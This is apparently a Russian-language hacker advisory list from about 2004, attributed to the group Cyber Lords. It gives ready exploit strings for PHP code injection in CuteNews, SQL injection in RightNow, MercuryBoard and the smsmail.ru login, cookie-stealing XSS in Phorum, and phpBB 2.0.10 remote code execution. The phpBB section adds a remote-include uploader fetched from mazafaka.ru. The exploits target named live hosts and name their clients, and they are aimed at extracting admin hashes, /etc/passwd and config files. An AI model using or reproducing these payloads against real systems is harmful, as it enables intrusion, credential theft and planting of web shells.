Все нижеперечисленные уязвимости (кроме уязвимости в phpbb) и способы их использования (включая уязвимость в phpbb =)) найдены командой Cyber Lords [cyberlords.net]
CuteNews 1.3 [old versions] |
В версии 1.3 и возможно более новых. В последних версиях устранено. |
PHP Code injection |
Довольно распространённый скрипт управления новостями с
гибкими настройками.При добавлении новых комментариев скрипт записывает
в flood.db.php ip пользователя, id новости и время добавления. Но скрипт
не проверяет id новости на опасные символы, что позволяет внедрить произвольный php код и выполнить его на сервере, напрямую обратившись к скрипту. |
<form method=POST name=comment action="http://host.ru/cutenews/show_news.php?subaction=showcomments&id=<?include($_GET[cmd])?>&archive=&cnshow=news"> <input type=hidden name="name" value="xxxxxx"> <input type=hidden name="comments" value="xxxxx xxxx"> <input type=submit name=submit value=' Add My Comment ' accesskey="s"> <input type=hidden name=subaction value=addcomment /> <input type=hidden name=ucat value="" /> <input type=hidden name=show value="" /> </form> затем => http://host.ru/cutenews/inc/flood.db.php?cmd=ls . Также во всех версиях присутствует php code injection в файлы шаблонов, но для это требуются права администратора в CuteNews. Примеры уязвимых хостов: http://www.hometheatercomputer.net/news/ http://www.bluehost.net/cutenews/ |
Knowledge Base system от rightnow.com [*HOT!*] |
[все версии] |
SQL injection |
Распространённая мощная система помощи пользователям. Примерная
стоимость $50000 (пятьдесят тысяч), отсюда и серьёзные клиенты. Скрипт email_adp.php не проверяет данные на пример опасных символов, что позволяет внедрить sql запрос. |
http://rightnow.custhelp.com/cgi-bin/rightnow.cfg/php/enduser/email_adp.php?p_fa qid=118000)%20union%20select%20user()/* Клиенты: Toyota Motor Sales - Lexus Division, iPowerWeb, Inc., Adaptec, AAA Carolinas etc |
MercuryBoard |
[все версии] |
SQL injection |
Распространённый форум с большим количеством функций. |
Несколько sql injection. http://forums.mercuryboard.com/index.php?a=pm&s=view&m=1' http://forums.mercuryboard.com/index.php?a=post&s=reply&t=1' http://forums.mercuryboard.com/index.php?a=pm&s=view&m=1' Получаем md5 hash пароля администратора: http://forums.mercuryboard.com/index.php?a=post&s=reply&t=100&f=3&qu=100000%20un ion%20select%20user_password,2%20from%20mb_users%20where%20user_id=2/* Модифицируем свои cookie. Затем ищем топик с приаттаченными файлами или создаём сами. Смотрим id аттача. Топаем в админ панель, в Execute an SQL query и выполняем запрос: UPDATE mb_attach SET attach_file='../../../../../etc/passwd' WHERE attach_id=ид_аттача И смотрим содержимое /etc/passwd по адресу http://forums.mercuryboard.com/index.php?a=topic&s=attach&id=ид_аттача Например /etc/passwd с forums.mercuryboard.com: http://forums.mercuryboard.com/index.php?a=topic&s=attach&id=2 |
SmsMail.Ru |
самый крупный ру-сервис по отсылке SMS сообщений |
SQL injection |
SQL injection в http://smsmail.ru/ Отсутствие проверки входных данных при авторизации. http://smsmail.ru/edit.php Эксплуатация: В поле "Логин или телефон" ввести emlc2c' and m.domain='smsmail' and m.user_id = u.user_id and t.tariff=u.tariff union select 1,123,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,123,26,27, password,phone from users limit 1/* Клиенты: masterhost, Аэропорт "Домодедово" |
Phorum |
Phorum 5.0.13a Stable. [Последняя версия на 27.11.2004] |
Распространённый форум с множеством функций. |
XSS |
XSS в значении My Profile -> Real Name. Например John Smith<script>JavaScript.Code.Here</script>. При просмотре профиля пользователя выполнится произвольный JavaScript код. Например: John Smith<script>alert(document.cookie)</script> покажет куки пользователя (в том числе и md5 hash пароля). |
Zend Encoder |
[все версии] |
Программа, позволяющая кодировать PHP файлы так, что работоспособность
остаётся, но смотреть их уже нельзя. |
Уязвимость: |
Использование уязвимости в phpbb 2.0.10 (оффтоп: эта уязвимость найдена НЕ by ccteam.nu [личное мнение Satir]) |
http://www.host.ru/forum/viewtopic.php?p=25013&highlight=%2527.system($_GET[cmd]
).%2527&cmd=cat config.php либо http://www.host.ru/forum/viewtopic.php?p=25013&highlight=%2527.$poster=`cat%09co nfig.php`.%2527 Так можно закачать файл: http://www.host.ru/forum/viewtopic.php?p=25013&highlight=%2527.include($_GET[upl ]).%2527&upl=http://www.mazafaka.ru/upl.txt? в upl.txt: <? $dir = "rem.php"; if (is_uploaded_file($_FILES["yourfile"]["tmp_name"])) { $res = move_uploaded_file($_FILES["yourfile"]["tmp_name"], $dir); if ($res) echo "Файл успешно закачан в ".$dir; else echo "Ошибка записи файла!"; } else { echo "<form action=\"http://www.host.ru/forum/viewtopic.php?p=25013&highlight=%2527.include( \$_GET[upl]).%2527&upl=http://www.mazafaka.ru/upl.txt?\" method=post enctype=multipart/form-data> <input type=hidden name=act value=upload> Select file: <input type=file name=yourfile> <input type=submit value=\"UPLOAD\"> </form>"; } ?> |